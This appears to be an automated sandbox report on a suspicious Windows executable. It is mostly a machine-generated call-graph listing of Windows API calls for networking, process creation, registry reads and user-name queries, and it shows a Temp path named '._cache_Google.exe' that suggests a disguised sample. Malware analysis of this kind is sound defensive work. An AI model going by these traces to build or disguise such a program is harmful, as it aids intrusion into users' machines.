105011->105013 105015 4d010a 48 API calls 105012->105015 105014 4cf324 48 API calls 105013->105014 105018 50aea5 105014->105018 105016 50aeae WideCharToMultiByte 105015->105016 105017 4cf2d0 48 API calls 105016->105017 105017->105018 105018->105010 105020 4b84a6 81 API calls 105019->105020 105021 50f7db 105020->105021 105023 50f81d Mailbox 105021->105023 105055 510458 105021->105055 105023->103678 105024 50fa7c 105025 50fbeb 105024->105025 105027 50fa86 105024->105027 105090 510579 89 API calls Mailbox 105025->105090 105068 50f5fb 105027->105068 105029 50fbf8 105029->105027 105030 50fc04 105029->105030 105030->105023 105031 4b84a6 81 API calls 105049 50f875 Mailbox 105031->105049 105036 50faba 105082 4cf92c 105036->105082 105039 50fad4 105088 4fd520 86 API calls 4 library calls 105039->105088 105040 50faee 105042 4b3320 48 API calls 105040->105042 105044 50fb05 105042->105044 105043 50fadf GetCurrentProcess TerminateProcess 105043->105040 105046 4c14a0 48 API calls 105044->105046 105054 50fb2f 105044->105054 105045 50fc56 105045->105023 105051 50fc6f FreeLibrary 105045->105051 105047 50fb1e 105046->105047 105089 510300 105 API calls _free 105047->105089 105048 4c14a0 48 API calls 105048->105054 105049->105023 105049->105024 105049->105031 105049->105049 105086 5128d9 48 API calls _memmove 105049->105086 105087 50fc96 60 API calls 2 library calls 105049->105087 105051->105023 105053 4bd89e 50 API calls 105053->105054 105054->105045 105054->105048 105054->105053 105091 510300 105 API calls _free 105054->105091 105056 4bb8a7 48 API calls 105055->105056 105057 510473 CharLowerBuffW 105056->105057 105058 50267a 60 API calls 105057->105058 105059 510494 105058->105059 105061 4bd3d2 48 API calls 105059->105061 105066 5104cf Mailbox 105059->105066 105062 5104ac 105061->105062 105063 4b7f40 48 API calls 105062->105063 105064 5104c3 105063->105064 105065 4ba2fb 48 API calls 105064->105065 105065->105066 105067 51050b Mailbox 105066->105067 105092 50fc96 60 API calls 2 library calls 105066->105092 105067->105049 105069 50f616 105068->105069 105073 50f66b 105068->105073 105070 4d010a 48 API calls 105069->105070 105072 50f638 105070->105072 105071 4d010a 48 API calls 105071->105072 105072->105071 105072->105073 105074 510719 105073->105074 105075 510944 Mailbox 105074->105075 105081 51073c _strcat _wcscpy __NMSG_WRITE 105074->105081 105075->105036 105076 4bcdb4 48 API calls 105076->105081 105077 4bd00b 58 API calls 105077->105081 105078 4b84a6 81 API calls 105078->105081 105079 4d45ec 47 API calls __malloc_crt 105079->105081 105081->105075 105081->105076 105081->105077 105081->105078 105081->105079 105093 4f8932 50 API calls __NMSG_WRITE 105081->105093 105084 4cf941 105082->105084 105083 4cf9d9 select 105085 4cf9a7 105083->105085 105084->105083 105084->105085 105085->105039 105085->105040 105086->105049 105087->105049 105088->105043 105089->105054 105090->105029 105091->105054 105092->105067 105093->105081 105095 5123eb _memset 105094->105095 105096 512452 105095->105096 105097 512428 105095->105097 105100 4bcdb4 48 API calls 105096->105100 105101 512476 105096->105101 105098 4bcdb4 48 API calls 105097->105098 105099 512433 105098->105099 105099->105101 105103 4bcdb4 48 API calls 105099->105103 105102 512448 105100->105102 105104 4bcdb4 48 API calls 105101->105104 105106 5124b0 105101->105106 105108 4bcdb4 48 API calls 105102->105108 105103->105102 105104->105106 105105 4b84a6 81 API calls 105107 5124d4 105105->105107 105106->105105 105109 4b3bcf 48 API calls 105107->105109 105108->105101 105110 5124de 105109->105110 105111 5125a1 105110->105111 105112 5124e8 105110->105112 105114 5125d3 GetCurrentDirectoryW 105111->105114 105117 4b84a6 81 API calls 105111->105117 105113 4b84a6 81 API calls 105112->105113 105115 5124f9 105113->105115 105116 4d010a 48 API calls 105114->105116 105118 4b3bcf 48 API calls 105115->105118 105119 5125f8 GetCurrentDirectoryW 105116->105119 105120 5125b8 105117->105120 105121 512503 105118->105121 105122 512605 105119->105122 105123 4b3bcf 48 API calls 105120->105123 105124 4b84a6 81 API calls 105121->105124 105128 4bca8e 48 API calls 105122->105128 105131 51263e 105122->105131 105125 5125c2 __NMSG_WRITE 105123->105125 105126 512514 105124->105126 105125->105114 105125->105131 105127 4b3bcf 48 API calls 105126->105127 105129 51251e 105127->105129 105130 51261e 105128->105130 105133 4b84a6 81 API calls 105129->105133 105134 4bca8e 48 API calls 105130->105134 105132 51268a 105131->105132 105172 4fa17a 8 API calls 105131->105172 105139 5126c1 105132->105139 105140 51274c CreateProcessW 105132->105140 105136 51252f 105133->105136 105137 51262e 105134->105137 105141 4b3bcf 48 API calls 105136->105141 105142 4bca8e 48 API calls 105137->105142 105138 512655 105173 4fa073 8 API calls 105138->105173 105175 4ebc90 71 API calls 105139->105175 105152 51276b 105140->105152 105145 512539 105141->105145 105142->105131 105147 51256f GetSystemDirectoryW 105145->105147 105150 4b84a6 81 API calls 105145->105150 105146 512670 105174 4fa102 8 API calls 105146->105174 105149 4d010a 48 API calls 105147->105149 105153 512594 GetSystemDirectoryW 105149->105153 105151 512550 105150->105151 105154 4b3bcf 48 API calls 105151->105154 105156 512780 105152->105156 105157 5127bd CloseHandle 105152->105157 105153->105122 105155 51255a __NMSG_WRITE 105154->105155 105155->105122 105155->105147 105160 512791 GetLastError 105156->105160 105158 5127cb 105157->105158 105165 5127f5 105157->105165 105176 4f9d09 CloseHandle Mailbox 105158->105176 105159 5127fb 105162 5127a5 105159->105162 105160->105162 105177 4f9b29 CloseHandle 105162->105177 105165->105159 105168 512827 CloseHandle 105165->105168 105168->105162 105169 511f2b 105169->103108 105171 5126df __NMSG_WRITE 105171->105152 105172->105138 105173->105146 105174->105132 105175->105171 105177->105169 105178->103686 105180 4d4667 __calloc_impl 105179->105180 105185 4d45f8 __calloc_impl 105179->105185 105200 4d889e 47 API calls __getptd_noexit 105180->105200 105183 4d462b RtlAllocateHeap 105183->105185 105192 4d465f 105183->105192 105185->105183 105186 4d4653 105185->105186 105189 4d4603 105185->105189 105190 4d4651 105185->105190 105198 4d889e 47 API calls __getptd_noexit 105186->105198 105189->105185 105195 4d8e52 47 API calls 2 library calls 105189->105195 105196 4d8eb2 47 API calls 6 library calls 105189->105196 105197 4d1d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 105189->105197 105199 4d889e 47 API calls __getptd_noexit 105190->105199 105192->103134 105193->103137 105194->103139 105195->105189 105196->105189 105198->105190 105199->105192 105200->105192 105201->103142 105202->103148 105203->103146 105204->103163 105205->103177 105206->103171 105207->103194 105208->103194 105209 52c05b 105210 52c05d 105209->105210 105213 4f78ee WSAStartup 105210->105213 105212 52c066 105214 4f7917 gethostname gethostbyname 105213->105214 105215 4f79b1 _wcscpy 105213->105215 105214->105215 105216 4f793a _memmove 105214->105216 105215->105212 105217 4f7970 inet_ntoa 105216->105217 105221 4f7952 _wcscpy 105216->105221 105219 4f7989 _strcat 105217->105219 105218 4f79a9 WSACleanup 105218->105215 105222 4f8553 105219->105222 105221->105218 105223 4f8565 _strlen 105222->105223 105224 4f8561 105222->105224 105225 4f8574 MultiByteToWideChar 105223->105225 105224->105221 105225->105224 105226 4f858a 105225->105226 105227 4d010a 48 API calls 105226->105227 105228 4f85a6 MultiByteToWideChar 105227->105228 105228->105224 105229 521edb 105234 4b131c 105229->105234 105235 4b133e 105234->105235 105268 4b1624 105235->105268 105240 4bd3d2 48 API calls 105241 4b137e 105240->105241 105242 4bd3d2 48 API calls 105241->105242 105243 4b1388 105242->105243 105244 4bd3d2 48 API calls 105243->105244 105245 4b1392 105244->105245 105246 4bd3d2 48 API calls 105245->105246 105247 4b13d8 105246->105247 105248 4bd3d2 48 API calls 105247->105248 105249 4b14bb 105248->105249 105276 4b1673 105249->105276 105314 4b17e0 105268->105314 105271 4b7e53 48 API calls 105272 4b1344 105271->105272 105273 4b16db 105272->105273 105328 4b1867 6 API calls 105273->105328 105275 4b1374 105275->105240 105277 4bd3d2 48 API calls 105276->105277 105278 4b1683 105277->105278 105279 4bd3d2 48 API calls 105278->105279 105280 4b168b 105279->105280 105329 4b7d70 105280->105329 105321 4b17fc 105314->105321 105317 4b17fc 48 API calls 105318 4b17f0 105317->105318 105319 4bd3d2 48 API calls 105318->105319 105320 4b165b 105319->105320 105320->105271 105322 4bd3d2 48 API calls 105321->105322 105323 4b1807 105322->105323 105324 4bd3d2 48 API calls 105323->105324 105325 4b180f 105324->105325 105326 4bd3d2 48 API calls 105325->105326 105327 4b17e8 105326->105327 105327->105317 105328->105275 105330 4bd3d2 48 API calls 105329->105330 105331 4b7d79 105330->105331 105336 4b29c2 105337 4b29cb 105336->105337 105338 4b29e9 105337->105338 105339 4b2a48 105337->105339 105377 4b2a46 105337->105377 105343 4b2aac PostQuitMessage 105338->105343 105344 4b29f6 105338->105344 105341 522307 105339->105341 105342 4b2a4e 105339->105342 105340 4b2a2b DefWindowProcW 105370 4b2a39 105340->105370 105391 4b322e 16 API calls 105341->105391 105345 4b2a53 105342->105345 105346 4b2a76 SetTimer RegisterWindowMessageW 105342->105346 105343->105370 105348 4b2a01 105344->105348 105349 52238f 105344->105349 105350 4b2a5a KillTimer 105345->105350 105351 5222aa 105345->105351 105353 4b2a9f CreatePopupMenu 105346->105353 105346->105370 105354 4b2a09 105348->105354 105355 4b2ab6 105348->105355 105397 4f57fb 60 API calls _memset 105349->105397 105388 4b2b94 Shell_NotifyIconW _memset 105350->105388 105357 5222e3 MoveWindow 105351->105357 105358 5222af 105351->105358 105352 52232e 105392 4cec33 420 API calls Mailbox 105352->105392 105353->105370 105361 522374 105354->105361 105362 4b2a14 105354->105362 105381 4b1e58 105355->105381 105357->105370 105365 5222d2 SetFocus 105358->105365 105366 5222b3 105358->105366 105361->105340 105396 4eb31f 48 API calls 105361->105396 105368 4b2a1f 105362->105368 105369 52235f 105362->105369 105363 5223a1 105363->105340 105363->105370 105365->105370 105366->105368 105371 5222bc 105366->105371 105367 4b2a6d 105389 4b2ac7 DeleteObject DestroyWindow Mailbox 105367->105389 105368->105340 105393 4b2b94 Shell_NotifyIconW _memset 105368->105393 105395 4f5fdb 70 API calls _memset 105369->105395 105390 4b322e 16 API calls 105371->105390 105376 52236f 105376->105370 105377->105340 105379 522353 105394 4b3598 67 API calls _memset 105379->105394 105382 4b1e6f _memset 105381->105382 105383 4b1ef1 105381->105383 105398 4b38e4 105382->105398 105383->105370 105385 4b1eda KillTimer SetTimer 105385->105383 105386 524518 Shell_NotifyIconW 105386->105385 105387 4b1e96 105387->105385 105387->105386 105388->105367 105389->105370 105390->105370 105391->105352 105392->105368 105393->105379 105394->105377 105395->105376 105396->105377 105397->105363 105399 4b3900 105398->105399 105419 4b39d5 Mailbox 105398->105419 105400 4b7b6e 48 API calls 105399->105400 105401 4b390e 105400->105401 105402 4b391b 105401->105402 105403 52453f LoadStringW 105401->105403 105404 4b7e53 48 API calls 105402->105404 105406 524559 105403->105406 105405 4b3930 105404->105405 105405->105406 105407 4b3941 105405->105407 105421 4b39e8 48 API calls 2 library calls 105406->105421 105409 4b394b 105407->105409 105410 4b39da 105407->105410 105420 4b39e8 48 API calls 2 library calls 105409->105420 105412 4bc935 48 API calls 105410->105412 105411 524564 105414 4b3956 _memset _wcscpy 105411->105414 105415 524578 105411->105415 105412->105414 105418 4b39ba Shell_NotifyIconW 105414->105418 105422 4b39e8 48 API calls 2 library calls 105415->105422 105417 524586 105418->105419 105419->105387 105420->105414 105421->105411 105422->105417 105423 4d6a80 105424 4d6a8c __mtinitlocknum 105423->105424 105460 4d8b7b GetStartupInfoW 105424->105460 105427 4d6a91 105462 4da937 GetProcessHeap 105427->105462 105428 4d6ae9 105429 4d6af4 105428->105429 105547 4d6bd0 47 API calls 3 library calls 105428->105547 105463 4d87d7 105429->105463 105432 4d6afa 105433 4d6b05 __RTC_Initialize 105432->105433 105548 4d6bd0 47 API calls 3 library calls 105432->105548 105484 4dba66 105433->105484 105436 4d6b14 105437 4d6b20 GetCommandLineW 105436->105437 105549 4d6bd0 47 API calls 3 library calls 105436->105549 105503 4e3c2d GetEnvironmentStringsW 105437->105503 105440 4d6b1f 105440->105437 105446 4d6b45 105516 4e3a64 105446->105516 105447 4d6b4b 105448 4d6b56 105447->105448 105551 4d1d7b 47 API calls 3 library calls 105447->105551 105530 4d1db5 105448->105530 105461 4d8b91 105460->105461 105461->105427 105462->105428 105555 4d1e5a 30 API calls 2 library calls 105463->105555 105465 4d87dc 105556 4d8ab3 InitializeCriticalSectionAndSpinCount 105465->105556 105467 4d87e1 105468 4d87e5 105467->105468 105558 4d8afd TlsAlloc 105467->105558 105557 4d884d 50 API calls 2 library calls 105468->105557 105471 4d87f7 105471->105468 105473 4d8802 105471->105473 105472 4d87ea 105472->105432 105559 4d7616 105473->105559 105476 4d8844 105567 4d884d 50 API calls 2 library calls 105476->105567 105479 4d8823 105479->105476 105481 4d8829 105479->105481 105480 4d8849 105480->105432 105566 4d8724 47 API calls 4 library calls 105481->105566 105483 4d8831 GetCurrentThreadId 105483->105432 105485 4dba72 __mtinitlocknum 105484->105485 105576 4d8984 105485->105576 105487 4dba79 105488 4d7616 __calloc_crt 47 API calls 105487->105488 105490 4dba8a 105488->105490 105489 4dbaf5 GetStartupInfoW 105497 4dbc33 105489->105497 105500 4dbb0a 105489->105500 105490->105489 105491 4dba95 __mtinitlocknum @_EH4_CallFilterFunc@8 105490->105491 105491->105436 105492 4dbcf7 105583 4dbd0b LeaveCriticalSection _doexit 105492->105583 105494 4dbc7c GetStdHandle 105494->105497 105495 4d7616 __calloc_crt 47 API calls 105495->105500 105496 4dbc8e GetFileType 105496->105497 105497->105492 105497->105494 105497->105496 105499 4dbcbb InitializeCriticalSectionAndSpinCount 105497->105499 105498 4dbb58 105498->105497 105501 4dbb98 InitializeCriticalSectionAndSpinCount 105498->105501 105502 4dbb8a GetFileType 105498->105502 105499->105497 105500->105495 105500->105497 105500->105498 105501->105498 105502->105498 105502->105501 105504 4e3c3e 105503->105504 105505 4d6b30 105503->105505 105622 4d7660 47 API calls __malloc_crt 105504->105622 105510 4e382b GetModuleFileNameW 105505->105510 105508 4e3c64 _memmove 105509 4e3c7a FreeEnvironmentStringsW 105508->105509 105509->105505 105511 4e385f _wparse_cmdline 105510->105511 105512 4d6b3a 105511->105512 105513 4e3899 105511->105513 105512->105446 105550 4d1d7b 47 API calls 3 library calls 105512->105550 105623 4d7660 47 API calls __malloc_crt 105513->105623 105515 4e389f _wparse_cmdline 105515->105512 105517 4e3a75 105516->105517 105518 4e3a7d __NMSG_WRITE 105516->105518 105517->105447 105519 4d7616 __calloc_crt 47 API calls 105518->105519 105526 4e3aa6 __NMSG_WRITE 105519->105526 105520 4e3afd 105522 4d7616 __calloc_crt 47 API calls 105522->105526 105523 4e3b22 105526->105517 105526->105520 105526->105522 105526->105523 105527 4e3b39 105526->105527 105624 4e3317 47 API calls __gmtime64_s 105526->105624 105547->105429 105548->105433 105549->105440 105555->105465 105556->105467 105557->105472 105558->105471 105562 4d761d 105559->105562 105561 4d765a 105561->105476 105565 4d8b59 TlsSetValue 105561->105565 105562->105561 105563 4d763b Sleep 105562->105563 105568 4e3e5a 105562->105568 105564 4d7652 105563->105564 105564->105561 105564->105562 105565->105479 105566->105483 105567->105480 105569 4e3e65 105568->105569 105572 4e3e80 __calloc_impl 105568->105572 105570 4e3e71 105569->105570 105569->105572 105575 4d889e 47 API calls __getptd_noexit 105570->105575 105573 4e3e90 RtlAllocateHeap 105572->105573 105574 4e3e76 105572->105574 105573->105572 105573->105574 105574->105562 105575->105574 105577 4d89a8 EnterCriticalSection 105576->105577 105578 4d8995 105576->105578 105577->105487 105584 4d8a0c 105578->105584 105580 4d899b 105580->105577 105608 4d1d7b 47 API calls 3 library calls 105580->105608 105583->105491 105585 4d8a18 __mtinitlocknum 105584->105585 105586 4d8a39 105585->105586 105587 4d8a21 105585->105587 105589 4d8a37 105586->105589 105595 4d8aa1 __mtinitlocknum 105586->105595 105609 4d8e52 47 API calls 2 library calls 105587->105609 105589->105586 105612 4d7660 47 API calls __malloc_crt 105589->105612 105590 4d8a26 105610 4d8eb2 47 API calls 6 library calls 105590->105610 105593 4d8a4d 105596 4d8a54 105593->105596 105597 4d8a63 105593->105597 105594 4d8a2d 105611 4d1d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 105594->105611 105595->105580 105613 4d889e 47 API calls __getptd_noexit 105596->105613 105598 4d8984 __lock 46 API calls 105597->105598 105601 4d8a6a 105598->105601 105603 4d8a8e 105601->105603 105604 4d8a79 InitializeCriticalSectionAndSpinCount 105601->105604 105602 4d8a59 105602->105595 105614 4d28ca 105603->105614 105605 4d8a94 105604->105605 105620 4d8aaa LeaveCriticalSection _doexit 105605->105620 105609->105590 105610->105594 105612->105593 105613->105602 105615 4d28d3 RtlFreeHeap 105614->105615 105619 4d28fc __dosmaperr 105614->105619 105616 4d28e8 105615->105616 105615->105619 105621 4d889e 47 API calls __getptd_noexit 105616->105621 105618 4d28ee GetLastError 105618->105619 105619->105605 105620->105595 105621->105618 105622->105508 105623->105515 105624->105526 106410 524ddc 106411 524de6 VariantClear 106410->106411 106412 4c4472 106410->106412 106411->106412 106413 52c146 GetUserNameW 106414 4c1118 106480 4ce016 106414->106480 106416 4c112e 106417 4c1148 106416->106417 106418 52abeb 106416->106418 106420 4c3680 420 API calls 106417->106420 106494 4ccf79 49 API calls 106418->106494 106455 4bfad8 Mailbox _memmove 106420->106455 106422 52b628 Mailbox 106423 52ac2a 106425 52ac4a Mailbox 106423->106425 106495 4fba5d 48 API calls 106423->106495 106498 4fd520 86 API calls 4 library calls 106425->106498 106427 4bfbf1 Mailbox 106429 4c105e 106436 4bc935 48 API calls 106429->106436 106430 4bc935 48 API calls 106430->106455 106432 4c1063 106500 4fd520 86 API calls 4 library calls 106432->106500 106433 4c0dee 106434 4bd89e 50 API calls 106433->106434 106439 4c0dfa 106434->106439 106435 4c0119 106501 4fd520 86 API calls 4 library calls 106435->106501 106436->106427 106438 4bf6d0 420 API calls 106438->106455 106440 4bd89e 50 API calls 106439->106440 106441 4c0e83 106440->106441 106448 4bcaee 48 API calls 106441->106448 106442 4ea599 InterlockedDecrement 106442->106455 106443 52b772 106502 4fd520 86 API calls 4 library calls 106443->106502 106444 4bd3d2 48 API calls 106444->106455 106446 52b7d2 106447 4d1b2a 52 API calls __cinit 106447->106455 106457 4c10f1 Mailbox 106448->106457 106452 4c1230 106452->106427 106499 4fd520 86 API calls 4 library calls 106452->106499 106453 4d010a 48 API calls 106453->106455 106454 4bfa40 420 API calls 106454->106455 106455->106427 106455->106429 106455->106430 106455->106432 106455->106433 106455->106435 106455->106438 106455->106439 106455->106441 106455->106442 106455->106443 106455->106444 106455->106447 106455->106452 106455->106453 106455->106454 106455->106457 106459 52b583 106455->106459 106461 4cef0d 94 API calls 106455->106461 106462 4cdd84 3 API calls 106455->106462 106463 4b50a3 49 API calls 106455->106463 106464 511f19 134 API calls 106455->106464 106465 510bfa 129 API calls 106455->106465 106466 4cf461 98 API calls 106455->106466 106467 4b81c6 85 API calls 106455->106467 106468 50013f 87 API calls 106455->106468 106469 5092c0 88 API calls 106455->106469 106470 509122 91 API calls 106455->106470 106471 4cf03e 2 API calls 106455->106471 106472 5110e5 82 API calls 106455->106472 106473 508065 55 API calls 106455->106473 106474 50b74b 420 API calls 106455->106474 106475 5117aa 87 API calls 106455->106475 106476 5130ad 93 API calls 106455->106476 106477 51798d 109 API calls 106455->106477 106478 50936f 56 API calls 106455->106478 106479 51804e 113 API calls 106455->106479 106489 4c1620 59 API calls Mailbox 106455->106489 106490 50ee52 82 API calls 2 library calls 106455->106490 106491 50ef9d 90 API calls Mailbox 106455->106491 106492 4fb020 48 API calls 106455->106492 106493 50e713 420 API calls Mailbox 106455->106493 106497 4fd520 86 API calls 4 library calls 106457->106497 106496 4fd520 86 API calls 4 library calls 106459->106496 106461->106455 106462->106455 106463->106455 106464->106455 106465->106455 106466->106455 106467->106455 106468->106455 106469->106455 106470->106455 106471->106455 106472->106455 106473->106455 106474->106455 106475->106455 106476->106455 106477->106455 106478->106455 106479->106455 106481 4ce034 106480->106481 106482 4ce022 106480->106482 106484 4ce03a 106481->106484 106485 4ce063 106481->106485 106483 4bd89e 50 API calls 106482->106483 106488 4ce02c 106483->106488 106487 4d010a 48 API calls 106484->106487 106486 4bd89e 50 API calls 106485->106486 106486->106488 106487->106488 106488->106416 106489->106455 106490->106455 106491->106455 106492->106455 106493->106455 106494->106423 106495->106425 106496->106457 106497->106427 106498->106422 106499->106432 106500->106435 106501->106443 106502->106446 106503 52bc25 106504 52bc27 106503->106504 106507 4f79f8 SHGetFolderPathW 106504->106507 106506 52bc30 106506->106506 106508 4b7e53 48 API calls 106507->106508 106509 4f7a25 106508->106509 106509->106506 106510 521eca 106515 4cbe17 106510->106515 106514 521ed9 106516 4bd3d2 48 API calls 106515->106516 106517 4cbe85 106516->106517 106523 4cc929 106517->106523 106520 4cbf22 106521 4cbf3e 106520->106521 106526 4cc8b7 48 API calls _memmove 106520->106526 106522 4d1b2a 52 API calls __cinit 106521->106522 106522->106514 106527 4cc955 106523->106527 106526->106520 106528 4cc948 106527->106528 106529 4cc962 106527->106529 106528->106520 106529->106528 106530 4cc969 RegOpenKeyExW 106529->106530 106530->106528 106531 4cc983 RegQueryValueExW 106530->106531 106532 4cc9b9 RegCloseKey 106531->106532 106533 4cc9a4 106531->106533 106532->106528 106533->106532 106534 521e8b 106539 4ce44f 106534->106539 106538 521e9a 106540 4d010a 48 API calls 106539->106540 106541 4ce457 106540->106541 106542 4ce46b 106541->106542 106547 4ce74b 106541->106547 106546 4d1b2a 52 API calls __cinit 106542->106546 106546->106538 106548 4ce754 106547->106548 106549 4ce463 106547->106549 106579 4d1b2a 52 API calls __cinit 106548->106579 106551 4ce47b 106549->106551 106552 4bd3d2 48 API calls 106551->106552 106553 4ce492 GetVersionExW 106552->106553 106554 4b7e53 48 API calls 106553->106554 106555 4ce4d5 106554->106555 106580 4ce5f8 106555->106580 106558 4ce617 48 API calls 106567 4ce4e9 106558->106567 106560 5229f9 106562 4ce55f GetCurrentProcess 106593 4ce70e LoadLibraryA GetProcAddress 106562->106593 106563 4ce576 106565 4ce5ec GetSystemInfo 106563->106565 106566 4ce59e 106563->106566 106568 4ce5c9 106565->106568 106587 4ce694 106566->106587 106567->106560 106584 4ce6d1 106567->106584 106570 4ce5dc 106568->106570 106571 4ce5d7 FreeLibrary 106568->106571 106570->106542 106571->106570 106573 4ce5e4 GetSystemInfo 106575 4ce5be 106573->106575 106574 4ce5b4 106590 4ce437 106574->106590 106575->106568 106578 4ce5c4 FreeLibrary 106575->106578 106578->106568 106579->106549 106581 4ce601 106580->106581 106582 4ba2fb 48 API calls 106581->106582 106583 4ce4dd 106582->106583 106583->106558 106594 4ce6e3 106584->106594 106598 4ce6a6 106587->106598 106591 4ce694 2 API calls 106590->106591 106592 4ce43f GetNativeSystemInfo 106591->106592 106592->106575 106593->106563 106595 4ce55b 106594->106595 106596 4ce6ec LoadLibraryA 106594->106596 106595->106562 106595->106563 106596->106595 106597 4ce6fd GetProcAddress 106596->106597 106597->106595 106599 4ce5ac 106598->106599 106600 4ce6af LoadLibraryA 106598->106600 106599->106573 106599->106574 106600->106599 106601 4ce6c0 GetProcAddress 106600->106601 106601->106599 106602 4c0ff7 106603 4ce016 50 API calls 106602->106603 106604 4c100d 106603->106604 106660 4ce08f 106604->106660 106608 4c0119 106681 4fd520 86 API calls 4 library calls 106608->106681 106609 4bfbf1 Mailbox 106611 4c105e 106619 4bc935 48 API calls 106611->106619 106612 4bc935 48 API calls 106639 4bfad8 Mailbox _memmove 106612->106639 106614 4c0dee 106617 4bd89e 50 API calls 106614->106617 106615 4d010a 48 API calls 106615->106639 106616 4c1063 106680 4fd520 86 API calls 4 library calls 106616->106680 106620 4c0dfa 106617->106620 106618 52b772 106682 4fd520 86 API calls 4 library calls 106618->106682 106619->106609 106622 4bd89e 50 API calls 106620->106622 106621 4bf6d0 420 API calls 106621->106639 106623 4c0e83 106622->106623 106627 4bcaee 48 API calls 106623->106627 106624 4bd3d2 48 API calls 106624->106639 106626 52b7d2 106640 4c10f1 Mailbox 106627->106640 106629 4d1b2a 52 API calls __cinit 106629->106639 106632 4c103d 106632->106609 106679 4fd520 86 API calls 4 library calls 106632->106679 106633 4bfa40 420 API calls 106633->106639 106636 4ea599 InterlockedDecrement 106636->106639 106637 52b583 106677 4fd520 86 API calls 4 library calls 106637->106677 106639->106608 106639->106609 106639->106611 106639->106612 106639->106614 106639->106615 106639->106616 106639->106618 106639->106620 106639->106621 106639->106623 106639->106624 106639->106629 106639->106632 106639->106633 106639->106636 106639->106637 106639->106640 106641 4cef0d 94 API calls 106639->106641 106642 4cdd84 3 API calls 106639->106642 106643 4b50a3 49 API calls 106639->106643 106644 511f19 134 API calls 106639->106644 106645 510bfa 129 API calls 106639->106645 106646 4cf461 98 API calls 106639->106646 106647 4b81c6 85 API calls 106639->106647 106648 50013f 87 API calls 106639->106648 106649 5092c0 88 API calls 106639->106649 106650 509122 91 API calls 106639->106650 106651 4cf03e 2 API calls 106639->106651 106652 5110e5 82 API calls 106639->106652 106653 508065 55 API calls 106639->106653 106654 50b74b 420 API calls 106639->106654 106655 5117aa 87 API calls 106639->106655 106656 5130ad 93 API calls 106639->106656 106657 51798d 109 API calls 106639->106657 106658 50936f 56 API calls 106639->106658 106659 51804e 113 API calls 106639->106659 106672 4c1620 59 API calls Mailbox 106639->106672 106673 50ee52 82 API calls 2 library calls 106639->106673 106674 50ef9d 90 API calls Mailbox 106639->106674 106675 4fb020 48 API calls 106639->106675 106676 50e713 420 API calls Mailbox 106639->106676 106678 4fd520 86 API calls 4 library calls 106640->106678 106641->106639 106642->106639 106643->106639 106644->106639 106645->106639 106646->106639 106647->106639 106648->106639 106649->106639 106650->106639 106651->106639 106652->106639 106653->106639 106654->106639 106655->106639 106656->106639 106657->106639 106658->106639 106659->106639 106661 4b7b6e 48 API calls 106660->106661 106662 4ce0b4 _wcscmp 106661->106662 106663 4bcaee 48 API calls 106662->106663 106666 4ce0e2 Mailbox 106662->106666 106664 52b9c7 106663->106664 106683 4b7b4b 48 API calls Mailbox 106664->106683 106666->106639 106667 52b9d5 106668 4bd2d2 53 API calls 106667->106668 106669 52b9e7 106668->106669 106670 4bd89e 50 API calls 106669->106670 106671 52b9ec Mailbox 106669->106671 106670->106671 106671->106639 106672->106639 106673->106639 106674->106639 106675->106639 106676->106639 106677->106640 106678->106609 106679->106616 106680->106608 106681->106618 106682->106626 106683->106667 106684 52984d 106687 4b5577 106684->106687 106686 529859 106686->106686 106688 4b55bc 106687->106688 106689 5278fd 106687->106689 106691 4bd3d2 48 API calls 106688->106691 106689->106688 106690 527906 106689->106690 106708 50d443 420 API calls Mailbox 106690->106708 106707 4b55c4 106691->106707 106693 4bc935 48 API calls 106693->106707 106694 4b576b Mailbox 106694->106686 106696 4bca8e 48 API calls 106696->106707 106697 4bd380 55 API calls 106697->106707 106698 4bd2d2 53 API calls 106698->106707 106699 4bfa40 420 API calls 106699->106707 106700 4bcdb4 48 API calls 106700->106707 106702 4bd89e 50 API calls 106702->106707 106703 4b346e 48 API calls 106703->106707 106704 50d154 48 API calls 106704->106707 106705 4b57c4 106710 4fd520 86 API calls 4 library calls 106705->106710 106706 4b3320 48 API calls 106706->106707 106707->106693 106707->106694 106707->106696 106707->106697 106707->106698 106707->106699 106707->106700 106707->106702 106707->106703 106707->106704 106707->106705 106707->106706 106709 4b203a 420 API calls 106707->106709 106708->106694 106709->106707 106710->106705 106711 521eed 106716 4ce975 106711->106716 106713 521f01 106732 4d1b2a 52 API calls __cinit 106713->106732 106715 521f0b 106717 4d010a 48 API calls 106716->106717 106718 4cea27 GetModuleFileNameW 106717->106718 106719 4d297d __wsplitpath 47 API calls 106718->106719 106720 4cea5b _wcsncat 106719->106720 106733 4d2bff 106720->106733 106723 4d010a 48 API calls 106724 4cea94 _wcscpy 106723->106724 106725 4bd3d2 48 API calls 106724->106725 106726 4ceacf 106725->106726 106736 4ceb05 106726->106736 106728 4ceae0 Mailbox 106728->106713 106729 4d010a 48 API calls 106730 4ceada _wcscat __NMSG_WRITE _wcsncpy 106729->106730 106730->106728 106730->106729 106731 4ba4f6 48 API calls 106730->106731 106731->106730 106732->106715 106750 4daab9 106733->106750 106737 4bc4cd 48 API calls 106736->106737 106738 4ceb14 RegOpenKeyExW 106737->106738 106739 524b17 RegQueryValueExW 106738->106739 106740 4ceb35 106738->106740 106741 524b30 106739->106741 106742 524b91 RegCloseKey 106739->106742 106740->106730 106743 4d010a 48 API calls 106741->106743 106744 524b49 106743->106744 106745 4b4bce 48 API calls 106744->106745 106746 524b53 RegQueryValueExW 106745->106746 106747 524b86 106746->106747 106748 524b6f 106746->106748 106747->106742 106749 4b7e53 48 API calls 106748->106749 106749->106747 106751 4daaca 106750->106751 106752 4dabc6 106750->106752 106751->106752 106758 4daad5 106751->106758 106760 4d889e 47 API calls __getptd_noexit 106752->106760 106755 4cea8a 106755->106723 106757 4dabbb 106761 4d7aa0 8 API calls __gmtime64_s 106757->106761 106758->106755 106759 4d889e 47 API calls __getptd_noexit 106758->106759 106759->106757 106760->106757 106761->106755

                                                                                                                                                                              Executed Functions

                                                                                                                                                                              Function 004B374E Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 145windowCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 004B376D
                                                                                                                                                                                • Part of subcall function 004B4257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\._cache_Google.exe,00000104,?,00000000,00000001,00000000), ref: 004B428C
